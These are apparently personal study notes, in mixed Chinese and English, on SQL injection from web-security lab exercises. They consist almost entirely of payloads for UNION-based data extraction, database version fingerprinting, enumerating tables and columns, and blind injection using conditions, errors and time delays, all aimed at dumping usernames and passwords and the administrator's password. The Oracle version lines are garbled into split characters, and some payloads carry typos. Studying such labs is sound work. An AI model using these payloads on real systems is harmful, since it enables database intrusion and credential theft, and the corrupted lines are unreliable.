1.Retrieval of hidden data ---- Modify the category parameter, giving it the value '+OR+1=1-- 能看到所有的目录
- administrator’-- 可以忽略后面的 administrator%27–
3.determining the number of columns returned by the query 'UNION+SELECT+NULL,NULL–
'UNION+SELECT+NULL,NULL+FROM+DUAL–(Oracle)
'+UNION+SELECT+username,+password+FROM+users–
4.retrieving multiple values in a single column username||‘~’||password+FROM+users-- ~是用户名和密码之间的区分,用户自己加上的
- 'UNION+SELECT+null,banner+FROM+V v e r s i o n − − ′ U N I O N + S E L E C T + b a n n e r , n u l l + F R O M + V version-- 'UNION+SELECT+banner,null+FROM+V version−−′UNION+SELECT+banner,null+FROM+Vversion–
Database version
Oracle: SELECT banner FROM v
v
e
r
s
i
o
n
S
E
L
E
C
T
v
e
r
s
i
o
n
F
R
O
M
v
version SELECT version FROM v
versionSELECTversionFROMvinstance
Microsoft: SELECT @@version
PostgreSQL: SELECT version()
MySQL: SELECT @@version
-
之后忽略
Oracle: –
Microsoft: # -
listing the database contents on non-Oracle databases
'UNION+SELECT+table_name,null+FROM+information_schema.tables–
'UNION+SELECT+column_name,null+FROM+information_schema.columns+WHERE+table_name=‘users_hgapfx’–
'UNION+SELECT+username_qbyhqw,password_wwalgt+FROM+users_hgapfx-
8.listing the database contents on Oracle databases
'UNION+SELECT+table_name,NULL+FROM+ALL_TABLES–
'UNION+SELECT+COLUMN_NAME,NULL+FROM+ALL_TAB_columns+WHERE+table_name=‘USERS_QDVTGN’–
'UNION+SELECT+username_qbyhqw,password_wwalgt+FROM+users_hgapfx-
9.Lab: Blind SQL injection with conditional responses
'AND(SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>n)=‘a’–
'AND(SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>n)='a
—how much letters or numbers in the password
'AND (SELECT substring(password,1,1) FROM users WHERE username=‘administrator’)='a
10.Blind SQL injection with time delays
Oracle dbms_pipe.receive_message((‘a’),10)
Microsoft WAITFOR DELAY ‘0:0:10’
PostgreSQL SELECT pg_sleep(10)
MySQL SELECT SLEEP(10)
'||pg_sleep(10)–
11.Blind SQL injection with conditional errors
‘||+(select+case+when+substr(password,1,1)=‘a’+then+TO_CHAR(1/0)+ELSE+’‘+END+from+users+where+username=‘administrator’)+||’
12.Lab: Blind SQL injection with time delays and information retrieval
‘||pg_sleep(10)||’–
'||(select case when (username=‘administrator’ and substring(password,1,1)=‘a’) then bpg_sleep(10) else bpg_sleep(5) end from users)–